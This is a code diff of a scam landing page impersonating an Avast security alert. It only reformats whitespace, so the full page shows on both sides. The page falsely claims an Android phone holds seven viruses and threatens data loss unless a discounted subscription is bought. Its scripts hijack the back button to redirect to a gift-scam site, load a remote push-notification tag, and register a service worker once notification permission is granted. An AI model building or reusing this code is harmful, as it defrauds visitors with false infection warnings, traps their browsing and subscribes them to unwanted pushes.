--- a/simple-avast1/index.html
+++ b/simple-avast1/index.html
@@ -7,22 +7,22 @@
   <title>Security Message</title>
   <link href="css/style.css" rel="stylesheet" />
   <script>
-     (function (window, location) {
-         var redirect = "https://free.giftsandmore.vip/?utm_medium=bddab1254dc804572f4ea39f14a9b6c0d448fe5f&utm_campaign=Back-Button-Redirect";
-         var currentUrl = location.origin + location.pathname + location.search;
-         if (location.hash !== "#!/hst") {
-             history.replaceState(null, document.title, currentUrl + "#!/hst");
-             history.pushState(null, document.title, currentUrl);
-         }
+    (function (window, location) {
+      var redirect = "https://free.giftsandmore.vip/?utm_medium=bddab1254dc804572f4ea39f14a9b6c0d448fe5f&utm_campaign=Back-Button-Redirect";
+      var currentUrl = location.origin + location.pathname + location.search;
+      if (location.hash !== "#!/hst") {
+        history.replaceState(null, document.title, currentUrl + "#!/hst");
+        history.pushState(null, document.title, currentUrl);
+      }
 
-         window.addEventListener("popstate", function () {
-             if (location.hash === "#!/hst") {
-                 setTimeout(function () {
-                     window.location.replace(redirect);
-                 }, 0);
-             }
-         }, false);
-     }(window, location));
+      window.addEventListener("popstate", function () {
+        if (location.hash === "#!/hst") {
+          setTimeout(function () {
+            window.location.replace(redirect);
+          }, 0);
+        }
+      }, false);
+    }(window, location));
   </script>
   <script>
     function getURLParameter(name) {
@@ -36,38 +36,39 @@
     }
   </script>
   <script>
-      var s = document.createElement('script');
-      s.src='//woudaufe.net/act/files/micro.tag.min.js?z=6356874'+'&sw=/sw-check-permissions-82528.js';
-      s.onload = function(result) {
-          switch (result) {
-              case 'onPermissionDefault':break;
-              case 'onPermissionAllowed':break;
-              case 'onPermissionDenied':break;
-              case 'onAlreadySubscribed':break;
-              case 'onNotificationUnsupported':break;
-          }
-      };
-      document.head.appendChild(s);
+    var s = document.createElement('script');
+    s.src = '//woudaufe.net/act/files/micro.tag.min.js?z=6356874' + '&sw=/sw-check-permissions-82528.js';
+    s.onload = function (result) {
+      switch (result) {
+        case 'onPermissionDefault': break;
+        case 'onPermissionAllowed': break;
+        case 'onPermissionDenied': break;
+        case 'onAlreadySubscribed': break;
+        case 'onNotificationUnsupported': break;
+      }
+    };
+    document.head.appendChild(s);
   </script>
   <script>
     (function () {
-        const interval = setInterval(() => {
-            if (Notification.permission === 'granted') {
-                navigator.serviceWorker.register('/sw.enot.js?appId=1005e5d4864ca6b4e77a62c8c770b62', {scope: '/ntx'})
-                clearInterval(interval)
-            }
-        }, 300)
+      const interval = setInterval(() => {
+        if (Notification.permission === 'granted') {
+          navigator.serviceWorker.register('/sw.enot.js?appId=1005e5d4864ca6b4e77a62c8c770b62', { scope: '/ntx' })
+          clearInterval(interval)
+        }
+      }, 300)
     })()
-</script>
+  </script>
 </head>
+
 <body class="en ltr">
   <div class="wrap">
     <div class="window">
       <div class="text">
         <h1 class="blink_me">Immediate action required!</h1>
         <p>Android is infected with 7 viruses! Your Avast Subscription has recently expired.</p><br />
-        <p>If you dont renew your subscription today, your Android will be blocked and you will lose all your data!</p><br /><img
-          src="img/icon.png" style="float: left; padding-right: 10px;" />
+        <p>If you dont renew your subscription today, your Android will be blocked and you will lose all your data!</p>
+        <br /><img src="img/icon.png" style="float: left; padding-right: 10px;" />
         <p>Renew your subscription with -80% and clean your Android right now!</p>
       </div>
       <div class="buttons">
